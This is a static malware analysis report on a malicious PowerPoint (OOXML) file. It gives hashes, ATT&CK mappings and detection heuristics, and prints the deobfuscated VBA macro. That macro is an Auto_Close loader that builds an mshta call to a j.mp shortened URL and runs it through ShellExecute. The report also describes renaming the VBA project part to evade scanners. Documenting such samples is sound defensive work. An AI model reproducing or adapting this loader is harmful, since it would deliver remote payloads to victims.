Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9e559f2b4636ff47…

MALICIOUS

Office (OOXML)

8.4 KB First seen: 2021-06-13
MD5: b6fc9fd8b8beae8c0c4c962c54dd9eb9 SHA-1: 3a650e1a29b2d56a6615426e29ab1fd8515a6824 SHA-256: 9e559f2b4636ff47dc3dbd0ec75a6cdee5cadaa1ff3fd5cf252953bfc3ebc394
208 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The OOXML file contains a heavily obfuscated VBA macro within the Auto_Close function. This macro constructs a URL, 'https://j.mp/adsfljsdahdvstarajraj', and uses GetObject to execute a second-stage payload via ShellExecute. The obfuscation and use of Auto_Close indicate a malicious intent to download and run arbitrary code.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/villia.bin)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    = _
GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
: MsgBox "Microsoft Office not Installed"
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    = _
GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
: MsgBox "Microsoft Office not Installed"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Function _
Auto_Close _
() _

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1104 bytes
SHA-256: e22d4007949b8c7fca2429debefc5cd675efe02bffcc321fd4911cf6a95b58e5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Function _
X _
() _
As _
String
X _
= _
"M"
End _
Function
Function _
Y _
() _
As _
String
Y _
= _
"s"
End _
Function
Function _
Z _
() _
As _
String
Z _
= _
"H"
End _
Function
Function _
D _
() _
As _
String
D _
= _
"T"
End _
Function
Function _
E _
() _
As _
String
E _
= _
"a"
End _
Function
Function _
L _
() _
As _
String
L _
= _
"p"
End _
Function
Function _
K _
() _
As _
String
K _
= _
"j.mp/"
End _
Function
Function _
T() _
As _
String
T _
= _
"adsfljsdahdvstarajraj"
End _
Function
Function _
F _
() _
As _
String
F _
= _
"H" _
+ _
D _
+ _
D _
+ _
L _
+ _
"://" _
+ _
K _
+ _
T
End _
Function
Function _
calccc _
() _
As _
String
calccc _
= _
X _
+ _
Y _
+ _
Z _
+ _
D _
+ _
E
End _
Function
Function _
Auto_Close _
() _
As _
String
Set _
alsoasld _
= _
GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
: MsgBox "Microsoft Office not Installed"
: alsoasld _
. _
shellexecute _
calccc, F
End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/villia.bin 19456 bytes
SHA-256: ba3a4fd41266112be0b6c42b1895e6324ed73904d07bb6608a1501e95faf59fe

Open this report in the interactive analyzer, or submit your own file for analysis.